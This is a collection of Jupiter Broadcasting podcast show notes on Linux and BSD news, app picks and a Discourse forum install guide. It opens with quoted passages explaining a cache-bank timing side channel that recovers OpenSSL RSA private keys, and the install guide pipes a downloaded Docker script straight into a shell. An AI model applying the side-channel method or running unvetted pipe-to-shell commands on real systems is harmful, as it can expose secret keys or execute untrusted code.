“We believe that all Sandy Bridge processors are vulnerable. Earlier microarchitectures, such as Nehalem and Core 2 may be vulnerable as well. Our attack code does not work on Intel Haswell processors, where, apparently, cache-bank conflicts are no longer an issue”
“Cache timing attacks exploit timing differences between accessing cached vs. non-cached data. Since accessing cached data is faster, a program can check if its data is cached by measuring the time it takes to access it.”
“In one form of a cache timing attack, the attacker fills the cache with its own data. When a victim that uses the same cache accesses data, the victim’s data is brought into the cache. Because the cache size is finite, loading the victim’s data into the cache forces some of the attacker’s data out of a cache. The attacker then checks which sections of its data remain in the cache, deducing from this information what parts of the victim’s memory were accessed.”
“To facilitate access to the cache and to allow concurrent access to the L1 cache, cache lines are divided into multiple cache banks. On the processor we tested, there are 16 banks, each four bytes wide. The cache uses bits 2-5 of the address to determine the bank that a memory location uses. In the Sandy Bridge microarchitectures, the cache can handle concurrent accesses to different cache banks, however it cannot handle multiple concurrent accesses to the same cache bank. A cache-bank conflict occurs when multiple requests to access memory in the same bank are issued concurrently. In the case of a conflict, one of the conflicting requests is served immediately, whereas other requests are delayed until the cache bank is available.”
“The main operation OpenSSL performs when decrypting or signing using RSA is modular exponentiation. That is, it calculates cd mod n where d is the private key. To compute a modular exponentiation, OpenSSL repeatedly performs five squaring operations followed by one multiplication. The multiplier in the multiplications is one of 32 possible values. All the numbers involved in these operations are half the size of the key. That is, for a 2048 bit RSA key, the numbers are 1024 bits long.”
“Knowing which multiplier is used in each multiplication reveals the secret exponent and with it the private key. Past cache timing attacks against OpenSSL and GnuPG recover the multipliers by monitoring the cache lines in which the multipliers are stored. To protect against such attacks, OpenSSL stores the data of several multipliers in each cache line, ensuring that all of the cache lines are used in each multiplication. However, the multipliers are not spread evenly across cache banks. Instead, they are divided into 8 bins, each bin spanning two cache banks. More specifically, multipliers 0, 8, 16 and 24 only use bin 0, which spans cache banks 0 and 1. Multipliers 1, 9, 17, and 25 only use bin 1, which spans cache banks 2 and 3, etc. As a result of this memory layout, each multiplication accesses two cache banks slightly more than it accesses the other cache banks. For example, in the case of 4096-bit RSA, the multiplication makes 128 additional accesses to the multiplier’s cache banks.”
“Recovering a 4096 RSA key from 60% of the key material requires around two CPU hours and can be accomplished on a high-end server in less than 3 minutes.”

Feedback:

Round Up:

The post Open Server Sadness Layer | TechSNAP 256 first appeared on Jupiter Broadcasting.

How Not to Install Discourse | LAS 404

chris — Sun, 14 Feb 2016 19:16:01 +0000

To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

This week we talk about how you can have a working web forum in 10 minutes or less & all open source! Last week we talked about team collaboration software, but what about when you need a wider approach?

In the news we talk about an open source router; Russia dumping Windows, more updates to video editing on Linux, a super special live unboxing & more!

Thanks to:

Get Paid to Write for DigitalOcean

Direct Download:

RSS Feeds:

Become a supporter on Patreon:

— Show Notes: —

Brought to you by: Linux Academy

Pros of Hosting Your Own Forum

Advantages:

Not subject to rules of hosting site eg: reddit
Completely Open Source
Customized and branded for your community
Complete control over your community

Discourse – Civilized Discussion

100% Open Source
Incorporate Discourse into your site with complete confidence, the code belongs to everyone.
Mobile and Tablet
Designed for touch devices from day one. Automatic mobile and touch layouts that scale to fit your device.
Optimized for Reading
To keep reading, just keep scrolling. When you reach the bottom, suggested topics keep you reading.
Single Sign On
Seamlessly integrate Discourse with your existing site’s login system with easy, robust single sign on.
CDN Support
Easily plug in any CDN provider to speed up global access to your site.

Step by Step Guide

Sign up For Digital Ocean with code lasdigital
Sign up for an account at SparkPost.com
The default is 1GB, but 2GB is recommended
Choose Distro of Ubuntu 14.04 LTS
Pick your SSH Keys
Log INto your Droplet
If you’re running with 1GB or less setup a swap file

Execute the Following Commands to Setup Discourse

wget -qO- https://get.docker.com/ | sh

mkdir /var/discourse

git clone https://github.com/discourse/discourse_docker.git /var/discourse

cd /var/discourse

cp samples/standalone.yml containers/app.yml

nano containers/app.yml

Set the developer email to YOUR email
Set the hostname to the hostname of the machine
Set the SMTP address
Set the SMTP Port
Set the SMTP User
Set the SMTP Password

./launcher bootstrap app

./launcher start app

— PICKS —

Runs Linux

My Adult Sandbox RUNS LINUX

The East Carolina Geology department takes The East Carolinian inside its building and reveals an interesting new tool that will be used to teach students more about the topography landscapes of land and water.

After 100 years, scientists are finally closing in on Einstein’s ripples

The room Giaime had walked me into contained the hardware guts of the observatory’s active damping system. The lab’s seismic isolation sensors detect environmental vibrations ar__ound the observatory at all different frequencies, and then the compu__ter systems in this room drive servos that act to dampen those vibrations.

Desktop App Pick

CopyQ

Sent in by Rikai

CopyQ monitors system clipboard and saves its content in customized tabs. Saved clipboard can be later copied and pasted directly into any application.

Items can be:

edited with internal editor or with preferred text editor,
moved to other tabs
drag’n’dropped to applications,
marked with tag or a note,
passed to or changed by custom commands,
simply removed.

Weekly Spotlight

Stremio

Sent in by Khaotic_Linux

Stremio is an app that helps you organize and instantly watch your favorite videos, movies, TV series and TV channels.

Click and play your favourite movies, TV Shows, videos and TV channels.
Stremio automatically picks synced subtitles for your language.
Cast to AppleTV, Chromecast, Smart TV (DLNA/UPnP) and mobile devices.

— NEWS —

Russia to Ban Windows from Government PCs

Another radical change that German Klimenko wants to achieve is replacing Windows on all government PCs with a Linux-based operating system developed by Russia. Klimenko also stated that there are already 22,000 municipal authorities ready to replace Windows with their own operating system.

Open Source WiFi Router with Open Source Code

Our goal is to let Geek Force Board with all popular open source systems and every one can use free open source codes, including OPENWRT, Android, Ubuntu Snappy to make their own Roboto Multimedia WiFi Router Gateway Board.

3 Mini PCIe Slots
WiFi
BLE
LTE
Quad Cortex A7 1.3Ghz

Geek Force Board is designed for IoT Home Multimedia and Home Automation. With powerful Quad-core ARM Cotex-A7 1.3MHz made by Mediatek MT7623, could reach below applications (including TOR, VPN functions).

We are engaged in WiFi field for long time and would like to go with IoT trend. More and more IoT devices need a powerful gateway to link together and with media content bandwidth need.

With those interfaces, you can contribute your own roboto multimedia router.

Hardware is difficult, and we also would like to provide good Open Source firmwares (OPENWRT, Android, Ubuntu Snappy core) tuned for more people to implement their own systems.

WiTi Board | mqmaker

OpenShot 2.0 Beta Now Available

OpenShot 2.0 has a new beta build available for testing.

The update is the third full beta release of the revamped video editor but only the first to made available for public testing.

Among the features, fixes and improvements that are new in OpenShot 2.0.6: –

Smoother animations (zooming, panning, rotation)
Audio improvements
Autosave engine automatically saves your project at set intervals
Automatic project back-up and recovery
Support for importing/exporting Openshot projects across OSes
New Audio preview settings
Prompt when the application needs to “restart” for an option to take effect
Anonymous metric and error reporting enabled by default (can be disabled)
3 Years In The Making: OpenShot 2.0 Finally Hits Beta

It’s the first major release of the non-linear video editing tool in three years, and the first to arrive since the project successfully met its funding goal in the OpenShot Kickstarter campaign held in 2013.

We’ve seen the launch of professional-grade and pseudo-open source Lightworks video editor, huge improvements made to Qt-based Kdenlive, and even user-friendly Pitivi hasn’t been shy in pushing forward.

No one app suits everyone, and for this reason if no other it is great to see OpenShot back.

To install OpenShot 2.0 on Ubuntu 14.04 or later run the following two commands in a new Terminal window

sudo add-apt-repository ppa:openshot.developers/libopenshot-daily

sudo apt-get update && sudo apt-get install openshot-qt

Android Phone Makers will Switch to Linux

Factory and deliver devices powered by Ubuntu.

The Linux shop has received commitments from Android smartphone and tablet makers to ship devices using its Linux with devices “later this year.”

Chief executive Jane Silber told The Register: “We are talking to them [Android OEM partners] regularly and many will be shipping Ubuntu phones. There’s a lot of interest from these folks in supporting another platform.”

The company announced the Ubuntu variant of BQ’s M10 Aquarius tablet last week. BQ, an Ubuntu partner of two years, also ships M10 on Android. BQ was already selling two handsets running Ubuntu.

Canonical is also partnering with Android partner Meizu, which is shipping the MX4.

Mozilla said last week it’s stopping production of Firefox OS for smartphones, having had enough of trying to play catch up despite having had the muscle of Telefonica to help push it. Firefox OS was a Linux-based operating system that ran HTML5. Firefox OS will now go on “things” – starting with UHD TVs from Panasonic.

She would not say which of Google’s partners, currently making and selling Android phones and tablets, that Canonical has talked to, or which of those will embrace Ubuntu. However, Samsung – the biggest single beneficiary of Android on smartphones since the Galaxy – has made repeated noises about need for an alternative.

To date, Samsung has backed Tizen, which started as LiMo and received Intel’s backing in 2011 when the project was given the Tizen rebrand.

Silber is also dismissive of the suggestion Canonical and Ubuntu haven’t exactly triumphed in their various efforts to flip Mac or Windows loyalists. The goal in 2011 was for 200 million Ubuntu users by the end of that year – but today that figure, according to Canonical, is just 30 million desktops.

“Five years ago people said, why do you need another Linux distro?”

SourceForge Acquisition and Future Plans

Our first order of business was to terminate the “DevShare” program. As of last week, the DevShare program was completely eliminated. The DevShare program delivered installer bundles as part of the download for participating projects. We want to restore our reputation as a trusted home for open source software, and this was a clear first step towards that.

Feedback:

Brought to you by: System76

Mail Bag

https://stikked.luisaranguren.com/view/ad2b6826
https://stikked.luisaranguren.com/view/31292860
https://stikked.luisaranguren.com/view/9fe29026

Call Box

Chris’ call out for the community to help him with his background for the Linux Action Show

Catch the show LIVE SUNDAY:

— CHRIS’ STASH —

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

Find us on Twitter

Follow us on Facebook

The post How Not to Install Discourse | LAS 404 first appeared on Jupiter Broadcasting.

Live From System76 | LAS 391

chris — Sun, 15 Nov 2015 10:52:01 +0000

To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

We traveled to Denver Colorado to meet the folks behind System76, tour their office & record a live show on location. Join us as we go behind the scenes of a dedicated Linux hardware manufacture.

Plus Linux goes to space, Firefox OS has a new trick, the good news for open source router firmware & more!

Thanks to:

Get Paid to Write for DigitalOcean

Direct Download:

RSS Feeds:

Become a supporter on Patreon:

— Show Notes: —

Brought to you by: System76

LAS Visits System76

System76 – Ubuntu Laptops, Desktops, and Servers

System76 is a Denver, Colorado-based computer manufacturer specializing in the sale of notebooks, desktops, and servers. They are notable for their support of open-source software, only offering Ubuntu as the installed operating system.

The #system76fan roundtable discussion has begun! @ubuntu @thelinuxgamer @brianfagioli @ChrisLAS pic.twitter.com/6WHFxm43Sw

— System76 (@system76) November 13, 2015

#system76fan winners sit down with Dr.Emma to find out if they are human, robot, or cyborg. pic.twitter.com/s4Tuq6D6DI

— System76 (@system76) November 13, 2015

Playing NXS game created by Kevin Kane. this was a lot of fun. check it out at https://t.co/oqjD442J73 pic.twitter.com/ygHRuIF8Aj

— System76 (@system76) November 13, 2015

Video games with #system76fan winners! Fun challenging the @thelinuxgamer while he's here with us! @steam_games pic.twitter.com/6rYXMLLFhi

— System76 (@system76) November 13, 2015

System76 girls pose with the incredibly talented Helena. #creatormakerbuilder #womenintech https://t.co/Pp9sl2RBoI pic.twitter.com/wJ10fevT87

— System76 (@system76) November 13, 2015

— PICKS —

Runs Linux

Son’s Lego Robotics Club RUNS LINUX!

9 nine year old son wanted to join the Lego Robotics club

Hey guys, I’ve got a runs Linux for you. My 9 nine year old son wanted to join the Lego Robotics club at his elementary school. Because it is a volunteer-run program, I got roped into it. I ended up actually teaching the program and have been having a great time teaching the kids how to program their Lego EV3 robots. There are 12 kids in the group and the school district was supposed to configure 6 Apple laptops with the Lego programming software for us to use. Wouldn’t you know, there were some bureaucratic issues getting the laptops set up. Luckily, since my friends and family know I like to tinker with computers, I have 6 laptops at the house, most of which had been given to me because they had issues, that I subsequently fixed. Poking around in the menus on the Lego robot, I saw that the robot ran Linux (see attached pic). Honestly, I had more than half expected they would run Linux. Imagine my dismay when I went to the Lego website to download the software to write the programs to control the robots, only to discover that the Lego software was only available for Mac and Windows! So I spent a couple of evenings updating the Windows installs on the dual boot machines, and reinstalling Windows on the Linux-only machines, and for the last 6 weeks the kids have been downloading their robot controller programs from Windows machines onto the Linux robots. So the Lego EV3 robots run Linux, and the kids have been having a blast.

Regards
Ed

Desktop App Pick

TiddlyWiki

Have you ever had the feeling that your head is not quite big enough to hold everything you need to remember?

Welcome to TiddlyWiki, a unique non-linear notebook for capturing, organising and sharing complex information.

Use it to keep your to-do list, to plan an essay or novel, or to organise your wedding. Record every thought that crosses your brain, or build a flexible and responsive website.

Weekly Spotlight

Novacut

Novacut – direct to fan TV & film, plus the tools to help artists win

Novacut is a collaborative video editor that aims to bring the agile, distributed workflow pioneered by free software to professional movie and TV production

— NEWS —

International Space Station Planning for Linux

Keith Chuvala of United Space Alliance, a NASA contractor deeply involved in Space Shuttle and International Space Station (ISS) operations, decided to migrate to Linux. As leader of the Laptops and Network Integration Teams, Chuvala oversees the developers in charge of writing and integrating software for the Station’s “OpsLAN” – a network of laptops that provide the ISS crew with vital capabilities for day-to-day operations, from telling the astronauts where they are, to inventory control of the equipment used, to interfacing with the cameras that capture photos and videos.

Let’s Encrypt Public Beta: December 3, 2015

Let’s Encrypt will enter Public Beta on December 3, 2015. Once we’ve entered Public Beta our systems will be open to anyone who would like to request a certificate. There will no longer be a requirement to sign up and wait for an invitation.

Our Limited Beta started on September 12, 2015. We’ve issued over 11,000 certificates since then, and this operational experience has given us confidence that our systems are ready for an open Public Beta.

Let’s Encrypt on Linux Crazy Easyt

If you have Apache web server on Debian-based Linux Distribution, you can try the Apache module with automated renewal and installing:

Firefox OS 2.5 Developer Preview, an experimental Android app

Add-ons: Just like the add-ons we’ve come to love in desktop browsers, Firefox OS add-ons can extend just one app, several, or all of them, including the system app itself.
Private Browsing with Tracking Protection: A new Firefox privacy feature, Tracking Protection allows users to control how their browsing activity is tracked across many sites.
Pin the Web: Pin the Web removes the artificial distinction between web apps and web sites and lets you pin any web site or web page to your home screen for later usage.
Firefox OS Preview Android App

Introducing Firefox OS 2.5 Developer Preview, an experimental app that lets you use Firefox OS on your Android device.

The next big Gnome thing

Alex’s incredible work with xdg-app is a subject that gets talked about a lot, but it really can’t be emphasised how significant it is for GNOME as a project.

FCC: We aren’t banning DD-WRT on Wi-Fi routers

“We were not, but we agree that the guidance we provide to manufacturers must be crystal-clear to avoid confusion,” he wrote. “So, today we released a revision to that guidance to clarify that our instructions were narrowly focused on modifications that would take a device out of compliance.”

Feedback:

https://slexy.org/view/s214FkOi8T
https://slexy.org/view/s21ZHDxPup

Rover Log Playlist

Watch the adventures, productions, road trips, trails, mistakes, and fun of the Jupiter Broadcasting mobile studio.

Support Jupiter Broadcasting on Patreon

Chris’s Twitter account has changed, you’ll need to follow!

Chris Fisher (@ChrisLAS) | Twitter

— CHRIS’ STASH —

Hang in our chat room:

irc.geekshed.net #jupiterbroadcasting

— NOAH’S STASH —

Noah’s Day Job

Altispeed Technologies

Contact Noah

noah [at] jupiterbroadcasting.com

Find us on Google+

Find us on Twitter

Follow us on Facebook

Catch the show LIVE Friday:

The post Live From System76 | LAS 391 first appeared on Jupiter Broadcasting.

KDE Connect All the Things | LINUX Unplugged 114

chris — Tue, 13 Oct 2015 20:05:04 +0000

To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

We take a look at some of the coolest technologies coming out of the Plasma desktop & finally a open source router you and your family can use. Then we share some of our favorite ncurses terminal based applications, you might just be surprised at how modern these terminal apps are!

Thanks to:

Get Paid to Write for DigitalOcean

Direct Download:

RSS Feeds:

Become a supporter on Patreon:

Show Notes:

Pre-Show:

Feedback:

KDE Ships KDE Applications 15.08.2

October 13, 2015. Today KDE released the second stability update for KDE Applications 15.08.

This release contains only bugfixes and translation updates, providing a safe and pleasant update for everyone.

More than 30 recorded bugfixes include improvements to ark, gwenview, kate, kbruch, kdelibs, kdepim, lokalize and umbrello.

This release also includes Long Term Support version of KDE Development Platform 4.14.13.

Does LAS hate KDE? :

TING

Ting – mobile that makes sense

Using KDE Connect to Sync your Android Device with Your Linux Computer :

It is a great app that does not require you to use KDE. There is an indicator applet to make KDE Connect work with every DE. This makes it even more awesome.

DigitalOcean

DigitalOcean: SSD Cloud Server, VPS Server, Simple Cloud Hosting

Turris Omnia

Home router is necessary to connect you to the Internet but it is idle most of the time,
just eating electricity. Why not use it for more tasks?
With powerful hardware, Turris Omnia can handle gigabit traffic and still be able to do much more.
You can use it as a home server, NAS, printserver and it even has a virtual server built-in.

Linux Academy

Linux Academy | Linux and AWS Online Training

Episode Idea – Ncurses everything :

Toxic is a Tox-based instant messenging client which formerly resided in the Tox core repository, and is now available as a standalone application.

Pipecut Project Home

Pipecut tries to facilitate the development of pipelines by letting you see your data and your shell commands at the same time, eliminating the back and forth editing cycle of entering and quitting more(or less), then recalling and editing the command line. Since pipecut has an AST view of the Unix command line, it can provide shortcuts, optimizations, and do code generation that would not be possible otherwise.

RTV is an application that allows you to view and interact with reddit from your terminal. It is compatible with most terminal emulators on Linux and OSX.

C* Music Player

cmus is a small, fast and powerful console music player for Unix-like operating systems.

The Tilde Text Editor – ghalkes:~#

Tilde is a text editor for the console/terminal, which provides an intuitive
interface for people accustomed to GUI environments such as Gnome, KDE
and Windows. For example, the short-cut to copy the current selection is
Control-C, and to paste the previously copied text the short-cut Control-V can
be used. As another example, the File menu can be accessed by pressing Meta-F.

Runs Linux from the people:

Send in a pic/video of your runs Linux.
Please upload videos to YouTube and submit a link via email or the subreddit.

Support Jupiter Broadcasting on Patreon

The post KDE Connect All the Things | LINUX Unplugged 114 first appeared on Jupiter Broadcasting.

Gridless H4X0R | TTT 218

chris — Tue, 13 Oct 2015 11:30:49 +0000

To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

A new big tech trend right under our noses? A new generation of nomadic high-tech workers living off the grid, while staying always connected.

These developers ask why is there is much pressure to buy the biggest house, buy the best TV, get a great car?

Before us now is an entire world of possibilities & cultures, some of us have been completely blind to. The ability to live comfortably, in a tiny home, or an RV & move about or bring your home with you when you travel is an amazing way to live. We look at a few remarkable examples.

Direct Download:

RSS Feeds:

Become a supporter on Patreon

Show Notes:

— Episode Links —

Off the Grid, But Still Online | Motherboard

For the last 61 days I’ve been traveling throughout California while living out of my Corolla, collecting stories from people living off the grid.

The people I’ve met have abandoned the chase of the American Dream; they are not battling traffic to work a nine-to-five job in order to live in a big house or buy a fancy car. Instead, their values are centered around new life experiences, connecting with nature, building their own homes, growing their own food, and having a full sense of control over their lives—including managing the amount of time they spend on the internet.

The average American feels lost going a day without logging onto their social media accounts via smartphone, tablet, or computer. By contrast, these people know exactly how much power their solar panels need to generate to charge their phones or watch a DVD on their laptops, and they moderate their usage in the same way they would measure out exactly how much water they need to cook dinner and take a shower.

Joey Hess

So I’ve built etckeeper (managing /etc with git, for sysadmins), ikiwiki (wikis and blogs in git), and git-annex (applying git to very large files). I’m funded by a Kickstarter project in 2012-2013 to build something not unlike DropBox, based on git-annex, that automatically version controls and syncs files between computers.

I’m also a long-time Debian developer, having been involved in building the Debian installer, and I run a 30-year delayed Usenet feed at olduse.net.

joeyh (Joey Hess) · GitHub

This place is nicely remote, and off the grid, relying on solar power. I only get 50 amp-hours of juice on a sunny day, and often less than 15 amp-hours on a bad day. So the whole house runs on 12 volt DC power to avoid the overhead of an inverter; my laptop is powered through a succession of cheap vehicle power adapters, and my home server runs on 5 volt power provided by a USB adapter.

WatsonsWander

Since 2012 we have traveled the U.S. while living and working from our renovated 25-foot Airstream. Follow us on our crazy journey in search of beautiful scenery, fun adventures, interesting people, tasty foods, and more…

Watsons Wander Live

Since June 2012 we have traveled the U.S. while living and working from our 25-foot Airstream. We’ve crafted this interactive infographic, which is updated daily with the data from our journey.

WatsonsWander (@WatsonsWander) | Twitter

Technomadia | Adventures in Nomadic Serendipity

We’ve been perpetually on the road since 2006 combining technology and travel (tech+nomad).

We’re currently full time RVers roaming around in a geeked out vintage bus conversion.

We work remotely as technology & strategy advisors, app developers and authors.. always sucking up mobile internet bandwidth.

We love sharing a slice of our life from the road, provide a little inspiration and some lessons learned over the years.

Best RV Internet Access Options: The Learning Banks Uncensored at dc404 Sep 2015 – YouTube

06:05 Free Wifi – the reality
10:20 Cellular Internet – the reality
19:33 Put it all together
20:23 DIY RV wifi antenna repeater + Verizon (~$200 — Score: C)
26:40 WiFi Ranger + Wilson cradle booster and antenna (~$875 — Score: D-)
36:39 MaxxFi Standard (includes CradlePoint router, plus dual Wilson boosters and antennas (~$1700 — Score: C+)
53:50 Best RV internet options for the DIYer ~ $380
59:39 Part 2: Our solar power setup
1:01:00 Our goals for solar power
1:03:20 Expectation hardware needed
1:04:55 What did we install?
1:12:06 Solar power success!
1:14:26 In a perfect world
1:17:48 Parts list
1:20:26 Q&A

The post Gridless H4X0R | TTT 218 first appeared on Jupiter Broadcasting.

May Contain ZFS | BSD Now 102

chris — Thu, 13 Aug 2015 10:05:32 +0000

To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

This week on the show, we’ll be talking with Peter Toth. He’s got a jail management system called “iocage” that’s been getting pretty popular recently. Have we finally found a replacement for ezjail? We’ll see how it stacks up.

Thanks to:

Get Paid to Write for DigitalOcean

Direct Download:

RSS Feeds:

– Show Notes: –

Headlines

FreeBSD on Olimex RT5350F-OLinuXino

If you haven’t heard of the RT5350F-OLinuXino-EVB, you’re not alone (actually, we probably couldn’t even remember the name if we did know about it)
It’s a small board with a MIPS CPU, two ethernet ports, wireless support and… 32MB of RAM
This blog series documents installing FreeBSD on the device, but it is quite a DIY setup at the moment
In part two of the series, he talks about the GPIO and how you can configure it
Part three is still in the works, so check the site later on for further progress and info

The modern OpenBSD home router

In a new series of blog posts, one guy takes you through the process of building an OpenBSD-based gateway for his home network
“It’s no secret that most consumer routers ship with software that’s flaky at best, and prohibitively insecure at worst”
Armed with a 600MHz Pentium III CPU, he shows the process of setting up basic NAT, firewalling and even getting hostap mode working for wireless
This guide also covers PPP and IPv6, in case you have those requirements
In a similar but unrelated series, another user does a similar thing – his post also includes details on reusing your consumer router as a wireless bridge
He also has a separate post for setting up an IPSEC VPN on the router

NetBSD at Open Source Conference 2015 Kansai

The Japanese NetBSD users group has teamed up with the Kansai BSD users group and Nagoya BSD users group to invade another conference
They had NetBSD running on all the usual (unusual?) devices, but some of the other BSDs also got a chance to shine at the event
Last time they mostly had ARM devices, but this time the centerpiece was an OMRON LUNA88k
They had at least one FreeBSD and OpenBSD device, and at least one NetBSD device even had Adobe Flash running on it
And what conference would be complete without an LED-powered towel

OpenSSH 7.0 released

The OpenSSH team has just finished up the 7.0 release, and the focus this time is deprecating legacy code
SSHv1 support is disabled, 1024 bit diffie-hellman-group1-sha1 KEX is disabled and the v00 cert format authentication is disabled
The syntax for permitting root logins has been changed, and is now called “prohibit-password” instead of “without-password” (this makes it so root can login, but only with keys) – all interactive authentication methods for root are also disabled by default now
If you’re using an older configuration file, the “without-password” option still works, so no change is required
You can now control which public key types are available for authentication, as well as control which public key types are offered for host authentications
Various bug fixes and documentation improvements are also included
Aside from the keyboard-interactive and PAM-related bugs, this release includes one minor security fix: TTY permissions were too open, so users could write messages to other logged in users
In the next release, even more deprecation is planned: RSA keys will be refused if they’re under 1024 bits, CBC-based ciphers will be disabled and the MD5 HMAC will also be disabled

Interview – Peter Toth – peter.toth198@gmail.com / @pannonp

Containment with iocage

News Roundup

More c2k15 reports

A few more hackathon reports from c2k15 in Calgary are still slowly trickling in
Alexander Bluhm’s up first, and he continued improving OpenBSD’s regression test suite (this ensures that no changes accidentally break existing things)
He also worked on syslogd, completing the TCP input code – the syslogd in 5.8 will have TLS support for secure remote logging
Renato Westphal sent in a report of his very first hackathon
He finished up the VPLS implementation and worked on EIGRP (which is explained in the report) – the end result is that OpenBSD will be more easily deployable in a Cisco-heavy network
Philip Guenther also wrote in, getting some very technical and low-level stuff done at the hackathon
His report opens with “First came a diff to move the grabbing of the kernel lock for soft-interrupts from the ASM stubs to the C routine so that mere mortals can actually push it around further to reduce locking.” – not exactly beginner stuff
There were also some C-state, suspend/resume and general ACPI improvements committed, and he gives a long list of random other bits he worked on as well

FreeBSD jails, the hard way

As you learned from our interview this week, there’s quite a selection of tools available to manage your jails
This article takes the opposite approach, using only the tools in the base system: ZFS, nullfs and jail.conf
Unlike with iocage, ZFS isn’t actually a requirement for this method
If you are using it, though, you can make use of snapshots for making template jails

OpenSSH hardware tokens

We’ve talked about a number of ways to do two-factor authentication with SSH, but what if you want it on both the client and server?
This blog post will show you how to use a hardware token as a second authentication factor, for the “something you know, something you have” security model
It takes you through from start to finish: formatting the token, generating keys, getting it integrated with sshd
Most of this will apply to any OS that can run ssh, and the token used in the example can be found online for pretty cheap too

LibreSSL 2.2.2 released

The LibreSSL team has released version 2.2.2, which signals the end of the 5.8 development cycle and includes many fixes
At the c2k15 hackathon, developers uncovered dozens of problems in the OpenSSL codebase with the Coverity code scanner, and this release incorporates all those: dead code, memory leaks, logic errors (which, by the way, you really don’t want in a crypto tool…) and much more
SSLv3 support was removed from the “openssl” command, and only a few other SSLv3 bits remain – once workarounds are found for ports that specifically depend on it, it’ll be removed completely
Various other small improvements were made: DH params are now 2048 bits by default, more old workarounds removed, cmake support added, etc
It’ll be in 5.8 (due out earlier than usual) and it’s in the FreeBSD ports tree as well

Feedback/Questions

Send questions, comments, show ideas/topics, or stories you want mentioned on the show to feedback@bsdnow.tv
BSD Now tshirts are now available to preorder, and will be shipping in September (you have until the end of August to place an order, then they’re gone)
Next week’s episode will be a shorter prerecorded one, since Allan’s going to BSDCam

The post May Contain ZFS | BSD Now 102 first appeared on Jupiter Broadcasting.